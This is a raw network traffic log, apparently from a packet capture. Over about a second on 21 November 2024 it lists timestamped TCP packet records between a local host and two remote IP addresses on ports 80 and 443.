                                                                                                                                                                        Nov 21, 2024 10:37:47.746520042 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.746597052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.746649027 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.747129917 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.747210979 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.747359991 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.747692108 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.747711897 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.747931957 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.748060942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.748110056 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.748342037 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.748764992 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.748817921 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.748864889 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.749030113 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.749681950 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.749846935 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.749898911 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.750636101 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.750832081 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.750881910 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.751558065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.751640081 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.751691103 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.752460957 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.752563000 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.752612114 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.753340960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.753449917 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.753499985 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.754295111 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.754410982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.754462957 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.755363941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.755455017 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.756105900 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.756159067 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.756196976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.757026911 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.757075071 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.757154942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.757200956 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.758089066 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.758243084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.758285046 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.758977890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.759083986 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.759133101 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.759880066 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.760066986 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.760124922 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.760885000 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.761079073 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.761188030 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.761714935 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.761799097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.761837006 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.762590885 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.762702942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.762737989 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.763554096 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.763674974 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.764458895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.764499903 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.764625072 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.765389919 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.765495062 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.765598059 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.765635014 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.766246080 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.766417980 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.767204046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.767244101 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.767258883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.768090963 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.768126965 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.768193960 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.768244982 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.769020081 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.769258976 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.769413948 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.770212889 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.814084053 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.922846079 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.922873020 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.922929049 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.923022985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.923242092 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.923286915 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.923930883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.924066067 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.924860954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.924902916 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.925021887 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.925396919 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.925775051 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.925893068 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.925928116 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.926707983 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.926817894 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.926860094 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.927625895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.927745104 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.928530931 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.928592920 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.928603888 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.929399967 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.929465055 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.929558992 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.929601908 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.930397034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.930491924 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.930536032 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.931344032 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.931411982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.931829929 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.932307005 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.932447910 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.933135033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.933187962 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.933250904 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.934067011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.934118032 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.934154034 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.934190989 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.935043097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.935209990 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.935260057 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.936110973 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.936249971 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.936292887 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.937056065 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.937167883 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.937397957 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.937771082 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.937905073 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.938708067 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.938749075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.938783884 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.938807011 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.939714909 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.939837933 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.939887047 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.940594912 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.940659046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.940701962 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.941461086 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.941564083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.942392111 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.942440987 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.942513943 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.942554951 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.943334103 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.943420887 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.943466902 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.944317102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.944408894 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.944447994 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.945334911 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.945427895 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.945473909 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.946059942 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.946183920 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.947010040 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.947055101 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.947086096 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.947758913 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.947925091 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.948168993 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.948209047 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.948822975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.948996067 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.949037075 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.949774027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.949915886 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.950732946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.950779915 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.950835943 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.951610088 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.951658964 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.951685905 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.951724052 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.952491999 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.952605009 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.952646017 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.953439951 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.953485012 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.953531981 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.954399109 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.954454899 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.954498053 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.955184937 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.955334902 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.955382109 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.955425024 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.956183910 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.956257105 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.957145929 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.957187891 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.957251072 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.957396030 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.958067894 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.958216906 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.958250999 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.958981991 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.959099054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.959141016 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.959860086 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.959975004 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.960413933 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.960817099 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.960906982 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.961724043 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.961774111 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.961934090 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.962675095 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.962727070 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.962764978 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.962804079 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.963296890 CET4434979313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.963365078 CET4434979313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.963428020 CET49793443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:47.963607073 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.963766098 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.964534998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.964550972 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.964585066 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.964612007 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.965454102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.965524912 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.965563059 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.966387033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.966480970 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.966522932 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.967267036 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.967298985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.967386961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.967444897 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.968223095 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.968323946 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.969145060 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.969187975 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.969227076 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.969392061 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.970022917 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.970129013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:47.970166922 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:47.970915079 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.017194033 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.018693924 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.115875959 CET49793443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:48.115896940 CET4434979313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.115907907 CET49793443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:37:48.115914106 CET4434979313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.124079943 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.124208927 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.124260902 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.124515057 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.124629021 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.124672890 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.125432014 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.125507116 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.125549078 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.126379967 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.126503944 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.127280951 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.127334118 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.127469063 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.128248930 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.128292084 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.128463030 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.128501892 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.129118919 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.129230022 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.129271030 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.130079031 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.130182981 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.130224943 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.130950928 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.131052971 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.131880045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.131928921 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.132009029 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.132414103 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.132839918 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.132926941 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.132967949 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.133744955 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.133899927 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.133954048 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:48.134857893 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.135062933 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:48.135116100 CET4978780192.168.2.6185.215.113.16
